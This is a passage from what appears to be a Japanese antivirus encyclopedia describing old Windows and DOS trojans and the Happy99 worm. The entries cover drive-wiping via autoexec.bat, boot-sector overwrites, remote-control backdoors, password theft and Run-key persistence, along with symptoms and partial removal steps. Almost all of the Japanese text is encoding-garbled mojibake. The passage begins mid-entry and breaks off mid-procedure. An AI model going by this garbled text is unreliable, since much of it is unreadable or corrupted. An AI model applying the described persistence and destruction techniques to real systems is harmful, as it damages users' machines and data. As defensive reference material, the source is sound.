ÌÚÇÏ¥×¥í¥°¥é¥à¤ÏľÀÜ¥·¥¹¥Æ¥à¤ËÇ˲õ³èư¤ò¹Ô¤¦¤¬¡¢´¶À÷ ³èư¤Ï¹Ô¤ï¤Ê¤¤¡£ -¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È0.Hyb, S.Hyb, 1.Hyb, S.Hyb, 2. Hyb, S.Hyb, 3.Hyb, S.Hyb, 4.Hyb, S.Hyb, 5.Hyb ¤È¤¤¤¦ ¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¡¢¤½¤ì¤¾¤ì¤Î¥Õ¥¡¥¤¥ë¤Ë´Þ¤Þ¤ì¤ë¥Æ¥­¥¹ ¥È¤ò¡¢e.Hyb¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤Ë¥³¥Ô¡¼¤·¤Æ¤Þ¤È¤á¤ë¡£ - ¤½¤·¤Æ¡¢autoexec.bat ¥Õ¥¡¥¤¥ë¤Ë¤³¤Î¥Æ¥­¥¹¥È¤ò½ñ¤­¹þ ¤à¡£¤³¤Î¥Æ¥­¥¹¥È¤ÏÈó¾ï¤ËÇ˲õŪ¤Ê¥³¥Þ¥ó¥É¤È¤Ê¤Ã¤Æ¤¤¤ë¡£ ºÇ¸å¤Ë¥Æ¥­¥¹¥È¤Ç¹½À®¤·¤¿¥°¥í¥Æ¥¹¥¯¤Ê³¨¤òɽ¼¨¤·¤Æ¡¢¥× ¥í¥°¥é¥à¤òɽ¼¨¤¹¤ë¡£
»³²:
¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤·¤ÆAutoexec.bat¤¬½ñ¤­´¹¤¨¤ì¤ë ¤È¡¢¼¡²óºÆµ¯Æ°¤·¤¿¤È¤­¤Ë¡¢C-F¤Þ¤Ç¤Î¥É¥é¥¤¥ÖÆâ¤Î¥Õ¥¡¥¤ ¥ë¤ò¤¹¤Ù¤Æºï½ü¤µ¤ì¤Æ¤·¤Þ¤¦¡£

TROJ_RINGZERO


̾¡¡¡¡¾Î:TROJ_RINGZERO

ÊÌ¡¡¡¡Ì¾:Trojan.PSW.Ring, RingZero.gen

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:WIN95/WIN 98 / NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:165,544 bytes¾Ü¡¡¡¡ºÙ:¤³¤ì¤ÏWINDOWS
¾å¤Çưºî¤¹¤ë¥Ñ¥¹¥ï¡¼¥É¤òÅð¤à¥¿¥¤¥×¤Î¥È¥í¥¤¤ÎÌÚÇÏ¤Ç ¤¹¡£ ¼Â¹Ô¤¹¤ë¤È¡¢´¶À÷¤·¤¿¥·¥¹¥Æ¥à¤Î¾ðÊó¤ò¤³¤Î¥¦¥¤¥ë¥¹¤Îºî ¼Ô¤ËÁ÷¿®¤·¤Þ¤¹¡£¤³¤Î¾ðÊó¤ò¤â¤È¤Ë¡¢¹¶·â¼Ô¤Ï¹¥¤­¾¡¼ê¤Ë ¥æ¡¼¥¶¡¼¤Î¥Þ¥·¥ó¤òÁàºî¤¹¤ë¤³¤È¤¬²Äǽ¤Ë¤Ê¤ê¤Þ¤¹¡£ ¤Þ¤¿¡¢Windows\system¥Ç¥£¥ì¥¯¥È¥ê¤ËIts.exe¤ÈRING0.VXD ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¤Þ¤¹¡£¤³¤ì¤é¤Î¥Õ¥¡¥¤¥ë¤òÍøÍÑ ¤·¡¢Â¿¤¯¤Î¥Ñ¥¹¥ï¡¼¥ÉÀàÅð·¿¥È¥í¥¤¤ÎÌÚÇÏ¤ÈÆ±¤¸¤è¤¦¤Ë¡¢ ¤³¤ÎTROJ_RINGZERO¤â¡¢¥Í¥Ã¥È¥ï¡¼¥¯¤ò¥È¥ì¡¼¥¹¤·¡¢¥¦¥¤¥ë ¥¹¤Îºî¼Ô¤Ë¾ðÊó¤òή¤¹¤È¤¤¤¦Æ°ºî¤ò¹Ô¤¤¤Þ¤¹¡£
È÷¡¡¡¡¹Í:Ring0.Vxd¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤ÏLE_RINGZERO¤È¤¤¤¦
̾¾Î¤Ç¸¡½Ð¤ËÂбþ¤·¤Æ¤¤¤Þ¤¹¡£

TROJ_ROBB


̾¡¡¡¡¾Î:TROJ_ROBB

ÊÌ¡¡¡¡Ì¾:ROB

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:877 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:¡Ý¡¡DOSVer.2°Ê¾å¤Çưºî¤¹¤ë¥È¥í¥¤¤ÎÌÚÇÏ·¿°­
¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡´¶À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡ ¡Ý¡¡¥¦¥¤¥ë¥¹¥³¡¼¥ÉÆâ¤Ë°Ê²¼¤Îʸ»úÎ󤬰Ź沽¤µ¤ì¤Æ´Þ¤Þ
¤ì¤Æ¤¤¤ë:
¡È[ROB] The SAVAGE Trojan by TTA¡É ¡ÈAxe your machine - Your hard drive is HISTORY!! HA HA HA HA HA HA HAHA HA HA HA HA HA HA HA HA HA HA HA HA HA HA !!!!¡É ¡È(FUCK where¡Çs that last backup? Shit it¡Çs only 5 MONTHS OLD!)¡É.
Ç˲õ³èư:
¡¡¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Ö¡¼¥È¥»¥¯¥¿¡¼¤Ê¤É¤ò¾å½ñ¤­¤·¡¢¥Ï ¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Ç¡¼¥¿¤òÇ˲õ¤¹¤ë¡£ ¡Ý¡¡¥×¥í¥°¥é¥à¤¬µ¯Æ°¤µ¤ì¤ë¤È°Ê²¼¤Îʸ»úÎó¤ò´Þ¤à¥á¥Ã¥»
¡¼¥¸¤òɽ¼¨¤¹¤ë:
¡ÈNow How old was that backup?? Serves you right!¡É ¡Ý¡¡¥á¥Ã¥»¡¼¥¸É½¼¨¸å¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Ö¡¼¥È¥»¥¯¥¿ ¡¼¤Ê¤É¤ò¾å½ñ¤­¤·¡¢¥­¡¼ÆþÎÏÂÔ¤Á¤Ë¤Ê¤ë¡£ ¡Ý¡¡¥­¡¼ÆþÎϤò¹Ô¤¦¤È¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤¬Ç˲õ¤µ¤ì¥Ï¡¼¥É¥Ç ¥£¥¹¥¯¤Ø¤Î¥¢¥¯¥»¥¹¤¬¤Ç¤­¤Ê¤¯¤Ê¤ë¡£ ¡Ý¡¡DOS¡¡Ver.2°ÊÁ°¤ÎDOS¤Ç¤ÏȯɤǤ­¤Ê¤¤¡£
È÷¡¡¡¡¹Í:

TROJ_SATANSBD.C


̾¡¡¡¡¾Î:TROJ_SATANSBD.C

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¾Ü¡¡¡¡ºÙ:- ¤³¤Î¥×¥í¥°¥é¥à¤ÏÊ̼ï¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í
¥°¥é¥àBack Orifice(TROJ_BOSERVER/TROJ_BOCLIENT)¤Î¤è¤¦ ¤Ê¥Í¥Ã¥È¥ï¡¼¥¯¥Ï¥Ã¥­¥ó¥°¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£ - ¤³¤ì¤ÏTROJ_SATANSBD.S¤¬Æ°ºî¤·¤Æ¤¤¤ëPC¤ò¥ê¥â¡¼¥ÈÁàºî ¤¹¤ë¤¿¤á¤Î¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡TROJ_SATANSBD. S¤¬Æ°ºî¤·¤Æ¤¤¤ëPC¤¬¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤Ç¤­¤ë´Ä¶­¤Ë¤¢ ¤ì¤Ð¡¢¥¤¥ó¥¿¡¼¥Í¥Ã¥È·Ðͳ¤Ç¤½¤Î¥Þ¥·¥ó¤ò¹¥¤­¾¡¼ê¤Ë¥³¥ó ¥È¥í¡¼¥ë¤¹¤ë¤³¤È¤¬¤Ç¤­¤ëŽ¡

TROJ_SATANSBD.S


̾¡¡¡¡¾Î:TROJ_SATANSBD.S

ÊÌ¡¡¡¡Ì¾:SATANSBD.BackOrifice, TROJ_SATANSBD.C

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:24,576 bytes

¾Ü¡¡¡¡ºÙ:- ¤³¤Î¥×¥í¥°¥é¥à¤ÏÊ̼ï¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í
¥°¥é¥àBack Orifice(TROJ_BOSERVER/TROJ_BOCLIENT)¤Î¤è¤¦ ¤Ê¥Í¥Ã¥È¥ï¡¼¥¯¥Ï¥Ã¥­¥ó¥°¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£ - TROJ_SATANSBD.S¤¬Æ°ºî¤·¤Æ¤¤¤ëPC¤ÏTROJ_SATANSBD.C¤¬ ưºî¤·¤Æ¤¤¤ëPC¤Ë¥ê¥â¡¼¥È¥³¥ó¥È¥í¡¼¥ë¤µ¤ì¤Æ¤·¤Þ¤¦¡£ TROJ_SATANSBD.S¤¬Æ°ºî¤·¤Æ¤¤¤ëPC¤¬¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ ¤Ç¤­¤ë´Ä¶­¤Ë¤¢¤ì¤Ð¡¢¥¤¥ó¥¿¡¼¥Í¥Ã¥È·Ðͳ¤Ç°­°Õ¤ÎÂè»°¼Ô ¤Ë¥³¥ó¥È¥í¡¼¥ë¤µ¤ì¤Æ¤·¤Þ¤¦¶²¤ì¤¬¤¢¤ë¡£ - ¤³¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤Ë¤Ï¥ê¥â¡¼¥È´ÉÍý¥æ¡¼¥Æ ¥£¥ê¥Æ¥£¤È¥Ï¥Ã¥«¡¼¡¦¥Ä¡¼¥ë¤¬ÁõÈ÷¤µ¤ì¤Æ¤¤¤ë¤Î¤Ç¡¢TROJ_ SATANSBD.C¤¬Æ°ºî¤·¤Æ¤¤¤ëPC¤«¤éÀܳÀè¤ÎPC¤Î¥Õ¥¡¥¤¥ë¤Î Êѹ¹¡¦ºï½ü¡¦PCÀßÄê¤Î²þÊѤʤɤò¹Ô¤¦¤³¤È¤¬¤Ç¤­¤ë¤Î¤Ç¥Ï ¥Ã¥«¡¼¤Ë¥ê¥â¡¼¥È¥³¥ó¥È¥í¡¼¥ë¤µ¤ì¤Æ¤·¤Þ¤¦¤ÈÂ礭¤ÊÈï³² ¤ò¼õ¤±¤ë²ÄǽÀ­¤¬¤¢¤ë¡£
È÷¡¡¡¡¹Í:¤³¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤ÏMicrosoft
VisualBasic v6.0¤Ç¥³¡¼¥Ç¥£¥ó¥°¤µ¤ì¤Æ¤¤¤ë¡£¤½¤ì¤æ¤¨ MSVBVM60.DLL¤Î¤è¤¦¤Ê¥é¥ó¥¿¥¤¥à¥â¥¸¥å¡¼¥ë¤¬Ìµ¤¤¤Èưºî ¤·¤Ê¤¤¡£

TROJ_SBD.S


̾¡¡¡¡¾Î:TROJ_SBD.S

ÊÌ¡¡¡¡Ì¾:BACKDOOR.SBD

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:77,824 bytes

¾Ü¡¡¡¡ºÙ:¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤Èޤ<¥ë¡¼¥È>\WINDOWS¥Ç¥£¥ì
¥¯¥È¥ê¤Ë¡ÉSYSPROT.EXE¡É¤È¤¤¤¦Ì¾Á°¤Ç¼«Ê¬¼«¿È¤ÎÊ£À½¤òºî À®¤¹¤ëŽ¡ ¤Þ¤¿Ž¤-¥Þ¥·¥óµ¯Æ°»þ¤ËËè²ó¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦ ¤Ë¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤ØSYSPROT.EXE¤òÅÐÏ¿¤¹¤ë¡£¤³¤ì¤Ë¤è ¤êޤ¥Þ¥·¥ó¤òµ¯Æ°¤¹¤ëÅ٤ˎ¤ ¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤ¬¼Â¹Ô¤µ¤ì¤ë Ž¡¼Â¹ÔÃæ¤Ï¥Õ¥¡¥¤¥ë¤Îºï½ü¤Ï¤Ç¤­¤Ê¤¤Ž¡ HKEY_LOCAK_MACHINE\SOFTWARE\Microsoft\Windows\ Currentversion\RunServices\sysprot protection _
¡¡ÃÍ)¡È:\windows\sysprot.exe¡É

¾É¾õ:¡Ý¤³¤ì¤Ïޤ¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤Ç¤¢¤ëŽ¡¥æ¡¼¥¶¡¼¤¬¤³
¤Î¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤·¤Æ¥Þ¥·¥ó¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤¹¤ë¤È¡¢¥Ï¥Ã ¥«¡¼¤¬¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë¤òÍøÍѤ·¤ÆŽ¤¥ê¥â¡¼¥È¥¢¥¯¥» ¥¹¤Ë¤è¤ê¡Ö¥Õ¥¡¥¤¥ë¤Ë¥¢¥¯¥»¥¹¤¹¤ë¡×¡Ö¥Ñ¥¹¥ï¡¼¥É¤òÅð ¤à¡×¡Ö¥Þ¥·¥ó¤ò¥·¥ã¥Ã¥È¥À¥¦¥ó¤¹¤ë¡×¤È¤¤¤Ã¤¿Áàºî¤ò¾¡¼ê ¤Ë¹Ô¤¦¤³¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ëŽ¡
È÷¡¡¡¡¹Í:¤³¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤ÏMicrosoft
VisualBasic v6.0¤Ç¥³¡¼¥Ç¥£¥ó¥°¤µ¤ì¤Æ¤¤¤ë¡£¤½¤ì¤æ¤¨ MSVBVM60.DLL¤Î¤è¤¦¤Ê¥é¥ó¥¿¥¤¥à¥â¥¸¥å¡¼¥ë¤¬Ìµ¤¤¤Èưºî ¤·¤Ê¤¤¡£

TROJ_SETUP


̾¡¡¡¡¾Î:TROJ_SETUP

ÊÌ¡¡¡¡Ì¾:SETUP.___ޤSETUPTROJAN.EXE

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:32ޤ256 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
-¡¡¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤¿¥Þ¥·¥ó¤Ë¤ÏŽ¤Æ±°ì¤ÎLAN¾å¤« ¤é¥¢¥¯¥»¥¹¤Ç¤­¤ë±£¤·¶¦Í­¥É¥é¥¤¥Ö¤¬ºîÀ®¤µ¤ì¤ëŽ¡¤³¤Î¶¦Í­ ¥É¥é¥¤¥Ö¤Ë¤Ë¥¢¥¯¥»¥¹¤¹¤ë¤Ë¤Ï¥Ñ¥¹¥ï¡¼¥É¤ÏɬÍ×¤Ç¤Ï ¤Ê¤¯Ž¤¤Þ¤¿Ž¤¥Õ¥ë¥¢¥¯¥»¥¹¤¬²Äǽ¤Ç¤¢¤ëŽ¡ -¡¡´¶À÷¤·¤¿¥Þ¥·¥ó¤Ë¥¢¥¯¥»¥¹¤¹¤ë¤Ë¤Ïޤޢ¥¹¥¿¡¼¥È¥á¥Ë¥å ¡¼Ž£¢ªŽ¢¥Õ¥¡¥¤¥ë̾¤ò»ØÄꤷ¤Æ¼Â¹ÔŽ£¤òÁª¤Óޤ"\\computername \c$"¤ÈÆþÎϤ¹¤ëŽ¡ ("computername"¤Ï´¶À÷¤·¤¿¥Þ¥·¥ó¤Î¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Î¶¦Í­ ̾) -¡¡¤³¤Î¶¦Í­¤òÍ­¸ú¤Ë¤¹¤ë¤Ë¤Ïޤ¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤·¤¿¸å¤Ë ¥Þ¥·¥ó¤òºÆµ¯Æ°¤·¤Ê¤¯¤Æ¤Ï¤Ê¤é¤Ê¤¤Ž¡
»³²:
-¡¡¥Þ¥·¥ó¤Î¥»¥­¥å¥ê¥Æ¥£¤¬¿¯³²¤µ¤ì¤ëŽ¡
´¶À÷Ãû¸õ:
-¡¡¥ì¥¸¥¹¥È¥ê¤Ë°Ê²¼¤Î¹àÌܤ¬¤¢¤ì¤Ðޤ¤½¤Î¥Þ¥·¥ó¤Ï´¶À÷¤· ¤Æ¤¤¤ëŽ¡ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Network\LanMan\C$
È÷¡¡¡¡¹Í:

TROJ_SIMON


̾¡¡¡¡¾Î:TROJ_SIMON

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Dos Exec

¥¦¥¤¥ë¥¹¥µ¥¤¥º:16727bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£
¥Õ¥¡¥¤¥ëÅù¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤¡£¤·¤«¤·¡¢°ìÅټ¹Ԥ¹¤ë ¤È¡¢Windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë¤¢¤ëAUTOEXEC.BAT, CONFIG. SYS, SYSTEM.INI ¤òºï½ü¤¹¤ë¡£¤Þ¤¿¡¢°ÕÌ£¤Î¤Ê¤¤¥Ç¥£¥ì¥¯ ¥È¥ê¤ò¤¿¤¯¤µ¤óºîÀ®¤¹¤ë¡£
¾É¾õ:
¡ÈSimon Sez You¡Çre Fucked!!!!¡É¤È¤¤¤¦¥á¥Ã¥»¡¼¥¸¤òɽ ¼¨¤¹¤ë¡£

TROJ_SKA


̾¡¡¡¡¾Î:TROJ_SKA

ÊÌ¡¡¡¡Ì¾:HAPPY99.EXE, HAPPY00.EXE, W32/SKA

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿,¥ï¡¼¥à

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:10,000bytes

ȯ¾ÍÃÏ:¥¢¥á¥ê¥«

ȯ¸«Æü:1999/1

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥ï¡¼¥à¤ËʬÎव¤ì¤ëÇ˲õ¥×¥í¥°¥é¥à¤Ç¤¢
¤ëŽ¡¥Í¥Ã¥È¥ï¡¼¥¯¤äE-MailޤNewsGroup¤òÄ̤¸¤ÆÂ¾¤Î¥Þ¥·¥ó¤Ë Áý¿£¤ò¹­¤²¤Æ¤¤¤¯¥¿¥¤¥×¤Ç¤¢¤êޤ¥í¡¼¥«¥ë¥Þ¥·¥óÆâ¤Ç¾¤Î¥Õ ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤¢¤ê¤Þ¤»¤ó¡£¤³¤Î¥×¥í¥°¥é¥à¤Ï¡¢ ¥æ¡¼¥¶¡¼¤Îµ¤¤Å¤«¤Ì¤¦¤Á¤Ë¥á¡¼¥ëÁ÷¿®»þ¤ä¥Ë¥å¡¼¥¹¥°¥ë ¡¼¥×¤Ø¤ÎÅê¹Æ»þ¤Ë¥ï¡¼¥à¼«¿È¤ò¼«Æ°Åª¤ËźÉÕ¤¹¤ë¤³¤È¤Ë¤è ¤Ã¤Æ³È»¶¤·¤Æ¤¤¤­¤Þ¤¹¡£ 1999ǯ1·î¤Ëȯ¸«¤µ¤ì¤¿¥ª¥ê¥¸¥Ê¥ëŽ¥¥Ð¡¼¥¸¥ç¥ó¤Ç »ÈÍѤµ¤ì¤ë¥Õ¥¡¥¤¥ë̾¤Ï¡¢Ž¢Happy99.exe¡×¤È¤¤¤¦Ì¾Á°¤Ç¤·¤¿¡£ ¤½¤Î¸å2000ǯ1·î¤Ë¤Ï2000ǯ¥Ð¡¼¥¸¥ç¥ó¤¬Åо줷¡¢»ÈÍÑ ¤µ¤ì¤ë¥Õ¥¡¥¤¥ë̾¤¬ ¡ÖHappy00.exe¡×¤È¤¤¤¦Ì¾¾Î¤Ë¡¢¤Þ¤¿¡¢É½¼¨¤¹ ¤ë²Ö²Ð¤Î¥¦¥£¥ó¥É¥¦¤â2000ǯ»ÅÍͤËÊѹ¹¤µ¤ì¤Æ¤¤¤Þ¤¹¡£¤¿ ¤À¤·¡¢¥á¥Ã¥»¡¼¥¸¤ä¥Õ¥¡¥¤¥ë̾¤Ê¤É¾®¤µ¤ÊÊѹ¹°Ê³°¤ÎÉôʬ ¤Ï¤Û¤ÜƱ¤¸¤Ç¤¢¤ê¥È ¥ì¥ó¥É¥Þ¥¤¥¯¥íÀ½ÉʤǤϤɤÁ¤é¤âTROJ_SKA¤È¤·¤ÆÈ¯¸«¤µ¤ì ¤Þ¤¹¡£Windows95/98´Ä¶­¤Ç¤Î¤ßưºî²Äǽ¤Ç ¤¹¡£
´¶À÷³èư:
¥ï¡¼¥à¤ò¼Â¹Ô¤¹¤ë¤È²Ö²Ð¤Î²èÁü¤òɽ¼¨¤·¤Þ¤¹¡£1999ǯ¤È 2000ǯ¤Ç¤Ï¡¢¤½¤ì¤¾¤ì¡¢°Ê²¼¤Î¤è¤¦¤Ë¥á¥Ã¥»¡¼¥¸¤¬°Û¤Ê¤ê ¤Þ¤¹Ž¡ 1999ǯ¥Ð¡¼¥¸¥ç¥ó (HAPPY00.EXE); Happy New Year 1999 ! 2000ǯ¥Ð¡¼¥¸¥ç¥ó (HAPPY00.EXE); Happy New Year 2000 !²Ö²Ð¤¬É½¼¨¤µ¤ì¤Æ¤¤¤ë´Ö¤Ë¡¢¥ï¡¼¥à¤Ï¡¢ \Windows\System ¥Ç¥£¥ì¥¯¥È¥ê¤ËŽ¢SKA.EXEŽ£¤È¤¤¤¦Ì¾Á°¤Ç¼« ʬ¼«¿È¤ÎÊ£À½¤òºîÀ®¤·¤è¤¦¤È»î¤ß¤Þ¤¹Ž¡¤Þ¤º¡¢Ž¢SKA.DLL¡×¤È ¤¤¤¦Ì¾¾Î¤Î¥Õ¥¡¥¤¥ë¤¬¤¢¤ë¤«¤É¤¦¤«¤ò³Îǧ¤·Ž¤¤Ê¤¤¾ì¹ç¤Ï ¡ÖSKA.EXE¡×¤«¤é¡ÖSKA.DLL¡× ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òŸ³«¤·¤Þ¤¹ Ž¡ ¼¡¤Ë \%Systemroot%\Windows\System ¥Õ¥©¥ë¥ÀÆâ¤Ëޤޢ WSOCK32.SKAŽ£¥Õ¥¡¥¤¥ë¤¬¤¢¤ë¤«¤É¤¦¤«¤ò³Îǧ¤·¤Þ¤¹Ž¡¤â¤· ¤³¤Î̾Á°¤Î¥Õ¥¡¥¤¥ë¤¬¤Ê¤¤¾ì¹ç¤ÏޤޢWSOCK32.DLLŽ£¤òŽ¢ WSOCK32.SKAŽ£¤È¤¤¤¦Ì¾Á°¤ÇÊ£À½¤·¤ÆÊݸ¤·¤Þ¤¹Ž¡ ¤â¤·Ž¤¥ï¡¼¥à¤Î¼Â¹Ô»þ¤Ë¡ÖWSOCK32.DLL¡×¤¬Windows¤Ë¤è¤Ã ¤Æ»ÈÍÑÃæ¤ÇÊѹ¹¤¹¤ë¤³¤È¤¬¤Ç¤­¤Ê¤«¤Ã¤¿¾ì¹ç¤Ïޤ°Ê²¼¤Î¥­ ¡¼¤ò¥ì¥¸¥¹¥È¥ê¤ËÉÕ¤±²Ã¤¨¤Þ¤¹¡£ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\RunOnceÃÍ : Ska.exe="Ska.exe"
¡¡¤³¤Î¤¿¤áޤ¼¡¤Ë¥Þ¥·¥ó¤òµ¯Æ°¤·¤¿¤È¤­¤Ë°ìÅÙ¤À¤±¡ÖSKA. EXE¡×¤¬¼Â¹Ô¤µ¤ì¤Þ¤¹Ž¡¤³¤¦¤·¤Æ¡ÖWSOCK32.DLL¡×¤ò¾¤Î¥¢¥× ¥ê¥±¡¼¥·¥ç¥ó¤¬»ÈÍѤ¹¤ëÁ°¤Ë½¤Àµ¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£
Ç˲õ³èư:
¥ï¡¼¥à¤Ë¤è¤Ã¤Æ½¤Àµ¤µ¤ì¤¿¡ÖWSOCK32.DLL¡×¤Ïޤ¥Þ¥·¥ó¤¬¥Í ¥Ã¥È¥ï¡¼¥¯¤Ë¤Ä¤Ê¤¬¤Ã¤Æ¥á¡¼¥ë¤òÁ÷¤ë¤Ê¤É¤Îưºî¤¬¤¢¤ë¤« ¤É¤¦¤«¤ò´Æ»ë¤·¤Þ¤¹Ž¡¶ñÂÎŪ¤Ë¤ÏSMTP¤Î¥Ý¡¼¥È25¡¢NNTP¤Î ¥Ý¡¼¥È119¤ËÂФ·¡¢¥á¡¼¥ë¤ä¥Ë¥å¡¼¥¹¥°¥ë¡¼¥×¤Ø¤ÎÅê¹Æ¤Î ´Ø¿ô¤¬¸Æ¤Ó½Ð¤µ¤ì¤ë¤È "mail"¤È"news"¤È¤¤¤¦Æó¤Ä¤Î¥¨¥¯ ¥¹¥Ý¡¼¥È´Ø¿ô¤ò¤â¤ÄŽ¢SKA.DLLŽ£¤ò¥í¡¼¥É¤·¤Þ¤¹¡£¥í¡¼¥É¤µ ¤ì¤¿SKA.DLL¤ÏŽ¢SKA.EXEŽ£¤òUUencode·Á¼°¤Ç¥¨¥ó¥³¡¼¥É¤·¤¿ Ž¢HAPPYxx.exeŽ£¤ò¼«Æ°Åª¤ËźÉÕ¤·¤ÆÁ÷¿®¤µ¤»¤Æ¤·¤Þ¤¤¤Þ ¤¹¡£ ¤³¤Î¤È¤­¡¢1999ǯ¤È2000 ǯ¤Ç¤Ï¡¢¤½¤ì¤¾¤ì°Ê²¼¤Î¤è¤¦¤ËźÉÕ¤µ¤ì¤ë¥Õ¥¡¥¤¥ë̾¤¬°Û ¤Ê¤ê¤Þ¤¹Ž¡ 1999ǯ¥Ð¡¼¥¸¥ç¥ó (HAPPY00.EXE); Happy99.exe 2000ǯ¥Ð¡¼¥¸¥ç¥ó (HAPPY00.EXE); Happy00.exe Á÷¿®¤ËÀ®¸ù¤¹¤ë¤ÈޤWindows\System¥Õ¥©¥ë¥À¤Ë¡ÖLISTE. SKA¡×¤È¤¤¤¦Ì¾¤Î¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¡¢Á÷¿®¤·¤¿Áê¼ê¤Î¥á ¡¼¥ë¥¢¥É¥ì¥¹¤òµ­Ï¿¤·¤¿¥Æ¥­¥¹¥È¤È¤·¤ÆÊݸ¤·¤Þ¤¹¡£
È÷¡¡¡¡¹Í:**¥¦¥¤¥ë¥¹¥³¡¼¥ÉÆâ¤Ë¤Ï°Ê²¼¤Î¥Æ¥­¥¹¥È¤¬´Þ¤Þ
¤ì¤Æ¤¤¤Þ¤¹¡£ 1999ǯ¥Ð¡¼¥¸¥ç¥ó (HAPPY00.EXE); ¡ÈIs it a virus, a worm, a trojan? MOUT-MOUT Hybrid (c) Spanska 1999. " 2000ǯ¥Ð¡¼¥¸¥ç¥ó (HAPPY00.EXE); ¡ÈIs it a virus, a worm, a trojan? MOUT-MOUT Hybrid (c) Spanska 2000. ¡È **¼êưºï½ü¼ê½ç**¡Ê¥¦¥¤¥ë¥¹¤Ç¤Ï¤Ê¤¤¤Î¤Ç¶î½ü¤¹¤ë¤³¤È¤Ï ¤Ç¤­¤Þ¤»¤ó¡Ë ­¡¡ÖHAPPYxx.EXE¡×ޤ¡ÖSKA.EXE¡×ޤ¡ÖSKA.DLL¡×ޤ¡ÖWSOCK32. DLL¡×ޤ¡ÖLISTE.SKA¡×¤òºï½ü¤¹¤ë¡£ *¡ÖHAPPYxx.EXE¡×¤Ï¥ª¥ê¥¸¥Ê¥ë¤Î¥×¥í¥°¥é¥à¥Õ¥¡¥¤¥ë¤Ç ¤¹¡£ *¡ÖSKA.EXE¡×ޤ¡ÖSKA.DLL¡×ޤ¡ÖWSOCK32.DLL¡×ޤ¡ÖLISTE. SKA¡×¤ÏWindows¤ÎSystem¥Õ¥©¥ë¥À¡Ê "\Windows\System"¡Ë¤Ë¸ºß¤·¤Æ¤¤¤Þ¤¹¡£ *¡ÖWSOCK32.DLL¡×¤¬»ÈÍÑÃæ¤Î¤¿¤áºï½ü¤Ç¤­¤Ê¤¤¾ì¹ç¤Ï¡¢ Windows¤òSAFE MODE¤¢¤ë¤¤¤ÏMS-DOS 